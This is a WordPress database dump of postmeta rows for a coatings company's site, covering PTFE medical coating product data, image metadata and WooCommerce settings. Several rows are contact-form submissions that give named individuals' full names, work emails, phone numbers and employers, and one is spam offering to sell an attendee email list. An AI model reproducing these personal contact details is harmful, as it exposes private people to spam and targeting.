INSERT INTO `wp_postmeta` VALUES (37111, 4170, '_wp_old_slug', '850g-90xx-waterbased-acid-primer'); 
INSERT INTO `wp_postmeta` VALUES (37112, 4170, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37113, 4170, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37114, 4170, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (37115, 4170, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (37116, 4170, '_ywtm_content_tab_description', '<h2><strong>Water-based, Acid Primer PTFE Medical Coatings</strong></h2>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (37117, 4170, '_yoast_wpseo_metadesc', 'PTFE Medical Coatings utilizing a Water-based, Acid Primer one coat system. Superior adhesion, low coefficient of friction and no delamination'); 
INSERT INTO `wp_postmeta` VALUES (37118, 4170, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (37119, 4175, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37120, 4175, '_seq_num', '615'); 
INSERT INTO `wp_postmeta` VALUES (37121, 4175, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37122, 4175, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37123, 4175, '_field_1', 'Mac Schwandt'); 
INSERT INTO `wp_postmeta` VALUES (37124, 4175, '_field_10', 'Velodyne LiDAR'); 
INSERT INTO `wp_postmeta` VALUES (37125, 4175, '_field_2', 'mschwandt@velodyne.com'); 
INSERT INTO `wp_postmeta` VALUES (37126, 4175, '_field_8', '(231) 510-2128'); 
INSERT INTO `wp_postmeta` VALUES (37127, 4175, '_field_3', 'Do you know of any Tier 1 Auto Suppliers that currently use your krytox lubricant to get long service life of bearings in auto?  We want to find suppliers that have experience using your product for a new product.'); 
INSERT INTO `wp_postmeta` VALUES (37128, 4175, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37129, 4175, '_sub_id', '4175'); 
INSERT INTO `wp_postmeta` VALUES (37130, 4170, '_oembed_3987cb0c28f0e663186b3f0323a60c27', '<iframe width="1020" height="574" src="https://www.youtube.com/embed/7v-TgR59CRc?feature=oembed" frameborder="0" allowfullscreen></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (37131, 4170, '_oembed_time_3987cb0c28f0e663186b3f0323a60c27', '1498438411'); 
INSERT INTO `wp_postmeta` VALUES (37132, 4176, '_wp_attached_file', '2017/05/shutterstock_340196684.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37133, 4176, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/05/shutterstock_340196684.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_340196684-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_340196684-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_340196684-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_340196684-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_340196684-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_340196684-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_340196684-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37134, 4177, '_wp_attached_file', '2017/05/shutterstock_533329570.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37135, 4177, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/05/shutterstock_533329570.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_533329570-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_533329570-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_533329570-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_533329570-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_533329570-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_533329570-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_533329570-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37136, 4178, '_wp_attached_file', '2016/08/shutterstock_523637050.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37137, 4178, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2016/08/shutterstock_523637050.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_523637050-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_523637050-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_523637050-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_523637050-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_523637050-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_523637050-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_523637050-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37138, 4178, '_wp_attachment_image_alt', 'ReleaSys 8900'); 
INSERT INTO `wp_postmeta` VALUES (37139, 4179, '_wp_attached_file', '2016/08/shutterstock_375261412.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37140, 4179, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2016/08/shutterstock_375261412.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_375261412-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_375261412-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_375261412-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_375261412-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_375261412-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_375261412-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_375261412-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37141, 4179, '_wp_attachment_image_alt', 'ReleaSys 8500 Rubber mold release agent'); 
INSERT INTO `wp_postmeta` VALUES (37142, 4180, '_wp_attached_file', '2016/08/shutterstock_524224879.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37143, 4180, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:668;s:4:"file";s:34:"2016/08/shutterstock_524224879.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_524224879-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_524224879-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_524224879-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_524224879-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_524224879-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_524224879-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_524224879-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37144, 4180, '_wp_attachment_image_alt', 'ReleaSys 8200'); 
INSERT INTO `wp_postmeta` VALUES (37145, 4181, '_wp_attached_file', '2016/08/shutterstock_259045955-e1494258222421.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37146, 4181, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:540;s:6:"height";i:667;s:4:"file";s:49:"2016/08/shutterstock_259045955-e1494258222421.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:49:"shutterstock_259045955-e1494258222421-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_259045955-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_259045955-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:49:"shutterstock_259045955-e1494258222421-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:49:"shutterstock_259045955-e1494258222421-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:49:"shutterstock_259045955-e1494258222421-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:49:"shutterstock_259045955-e1494258222421-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37147, 4181, '_wp_attachment_backup_sizes', 'a:8:{s:9:"full-orig";a:3:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:26:"shutterstock_259045955.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:34:"shutterstock_259045955-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:34:"shutterstock_259045955-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:34:"shutterstock_259045955-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:30:"display_product_thumbnail-orig";a:4:{s:4:"file";s:34:"shutterstock_259045955-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:34:"shutterstock_259045955-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:34:"shutterstock_259045955-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:34:"shutterstock_259045955-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (37148, 4181, '_wp_attachment_image_alt', 'ReleaSys 8800'); 
INSERT INTO `wp_postmeta` VALUES (37149, 4182, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37150, 4182, '_seq_num', '616'); 
INSERT INTO `wp_postmeta` VALUES (37151, 4182, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37152, 4182, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37153, 4182, '_field_1', 'Kyle Green'); 
INSERT INTO `wp_postmeta` VALUES (37154, 4182, '_field_10', 'Pentair'); 
INSERT INTO `wp_postmeta` VALUES (37155, 4182, '_field_2', 'Kyle.Green@pentair.com'); 
INSERT INTO `wp_postmeta` VALUES (37156, 4182, '_field_8', '(780) 670-6286'); 
INSERT INTO `wp_postmeta` VALUES (37157, 4182, '_field_3', 'Hello, \r\n\r\nWe are currently planning on using MS-460H Silicone Conformal Coating for protecting our PCB&#039;s from humidity and I was wondering if you had any procedures for applying the conformal coating to the PCB. It seems every manufacturer has their own process and I want to make sure we follow the best practices for this specific product.\r\n\r\nThank you for your help.\r\n\r\nKyle Green'); 
INSERT INTO `wp_postmeta` VALUES (37158, 4182, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37159, 4182, '_sub_id', '4182'); 
INSERT INTO `wp_postmeta` VALUES (37160, 4183, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37161, 4183, '_seq_num', '617'); 
INSERT INTO `wp_postmeta` VALUES (37162, 4183, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37163, 4183, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37164, 4183, '_field_1', 'Kathy Peralta'); 
INSERT INTO `wp_postmeta` VALUES (37165, 4183, '_field_10', 'Molon Motor &amp; Coil Corp'); 
INSERT INTO `wp_postmeta` VALUES (37166, 4183, '_field_2', 'kperalta@molon.com'); 
INSERT INTO `wp_postmeta` VALUES (37167, 4183, '_field_8', '(847) 253-6000'); 
INSERT INTO `wp_postmeta` VALUES (37168, 4183, '_field_3', 'Please have a Rep contact me.'); 
INSERT INTO `wp_postmeta` VALUES (37169, 4183, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37170, 4183, '_sub_id', '4183'); 
INSERT INTO `wp_postmeta` VALUES (37171, 4184, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37172, 4184, '_seq_num', '618'); 
INSERT INTO `wp_postmeta` VALUES (37173, 4184, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37174, 4184, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37175, 4184, '_field_1', 'Jessica Smith'); 
INSERT INTO `wp_postmeta` VALUES (37176, 4184, '_field_10', 'Discover Organizations and Executives'); 
INSERT INTO `wp_postmeta` VALUES (37177, 4184, '_field_2', 'jessica@discover-organizations.com'); 
INSERT INTO `wp_postmeta` VALUES (37178, 4184, '_field_8', '(204) 801-5555'); 
INSERT INTO `wp_postmeta` VALUES (37179, 4184, '_field_3', 'Hi,\r\n\r\nAre you interested in acquiring 3,189 attendees of Space Tech Expo USA ? If yes, acquire this entire list with email address for flat $499 and lists will be delivered in an excel spread sheet. \r\n\r\nWe guarantee 90% of email accuracy and lists are delivered for your perpetual and unlimited usage. Attendees list will include following data fields contact name, company name, job title, telephone number, postal address, industry vertical, employee size, Web URL and email address.\r\n\r\nLet me know  your thoughts and please refer me to the right person making decision in acquiring Space Tech Expo USA attendees lists.\r\n\r\nRegards,\r\nJessica Smith\r\nDiscover Organizations and Executives\r\nPO box 47135\r\nCheyenne, WY 82001'); 
INSERT INTO `wp_postmeta` VALUES (37180, 4184, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37181, 4184, '_sub_id', '4184'); 
INSERT INTO `wp_postmeta` VALUES (37182, 4185, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37183, 4185, '_seq_num', '619'); 
INSERT INTO `wp_postmeta` VALUES (37184, 4185, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37185, 4185, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37186, 4185, '_field_1', 'Joseph Gallagher'); 
INSERT INTO `wp_postmeta` VALUES (37187, 4185, '_field_10', 'Celestica'); 
INSERT INTO `wp_postmeta` VALUES (37188, 4185, '_field_2', 'jgallag@celestica.com'); 
INSERT INTO `wp_postmeta` VALUES (37189, 4185, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (37190, 4185, '_field_3', 'Could you please send on an up to date safety data sheet for item MS-383A- Polyphenyl Ether Lubricants Please\r\n\r\nThank you\r\nRegards\r\nJoe\r\n'); 
INSERT INTO `wp_postmeta` VALUES (37191, 4185, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37192, 4185, '_sub_id', '4185'); 
INSERT INTO `wp_postmeta` VALUES (37193, 4186, '_edit_lock', '1498438621:3'); 
INSERT INTO `wp_postmeta` VALUES (37194, 4186, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (37195, 4187, '_wp_attached_file', '2017/05/shutterstock_572383276.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37196, 4187, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/05/shutterstock_572383276.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_572383276-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_572383276-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_572383276-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_572383276-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_572383276-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_572383276-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_572383276-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37197, 4187, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (37198, 4186, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (37199, 4186, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (37200, 4186, '_thumbnail_id', '4187'); 
INSERT INTO `wp_postmeta` VALUES (37201, 4186, '312_default_editor', '<p class="Body"><strong><span class="C-12">Fluoropolymer Medical Coatings:</span></strong></p>\r\n<p class="Body"><span class="C-8">Our PTFE-<wbr />coatings are optimized to provide superior adhesion to stainless steel guidewires and other metal wire.  No other product on the market can match the adhesion characteristics and durability of our coating technology.  These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements.  Extremely Low coefficient of friction tested by <span class="C-14">ASTM 1894; ASTM D3359 Adhesion Test; ISO 7802 Wire Wrap Test; ISO 11070 Corrosion Resistance Test</span></span></p>\r\n<p class="Body"><strong><span class="C-12">Usage Recommendations:</span></strong></p>\r\n<p class="Body"><span class="C-8">Miller-<wbr />Stephenson\'s Fluoropolymer coatings can be applied via spray or dip methods.  Proper post-<wbr />application curing equipment is critical to guarantee performance and durability. Acceptable curing equipment include high temperature ovens which can safely maintain temperatures of 400-<wbr />800 degree Fahrenheit or IR ovens.</span></p>'); 
INSERT INTO `wp_postmeta` VALUES (37202, 4186, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (37203, 4186, '1367_default_editor', '<ul>\r\n 	<li><strong>Water-based; Non Cr(VI) One Coat System</strong></li>\r\n 	<li><strong>Water-based; Non Cr(VI) One Coat System (Low-Bake)</strong> Ideal for Nitinol</li>\r\n 	<li><strong>Water-based; Non Cr(VI) Two-Coat System</strong></li>\r\n 	<li><strong>Water-based; Acid Primer One Coat</strong></li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (37204, 4186, '719_default_editor', 'These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements.\r\n<ul>\r\n 	<li><span class="C-14">ASTM 1894 Coefficient of Friction</span></li>\r\n 	<li><span class="C-14">ASTM D3359 Adhesion Test</span></li>\r\n 	<li><span class="C-14">ISO 7802 Wire Wrap Test</span></li>\r\n 	<li><span class="C-14">ISO 11070 Corrosion Resistance Test.</span></li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (37205, 4186, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (37206, 4186, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (37207, 4186, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (37208, 4186, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (37209, 4186, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (37210, 4186, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (37211, 4186, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (37212, 4186, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37213, 4186, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37214, 4186, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (37215, 4186, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37216, 4186, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (37217, 4186, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (37218, 4186, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (37219, 4186, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (37220, 4186, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (37221, 4186, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (37222, 4186, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (37223, 4186, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (37224, 4186, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (37225, 4186, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (37226, 4186, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (37227, 4186, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (37228, 4186, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37229, 4186, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37230, 4186, '_stock', ''); 
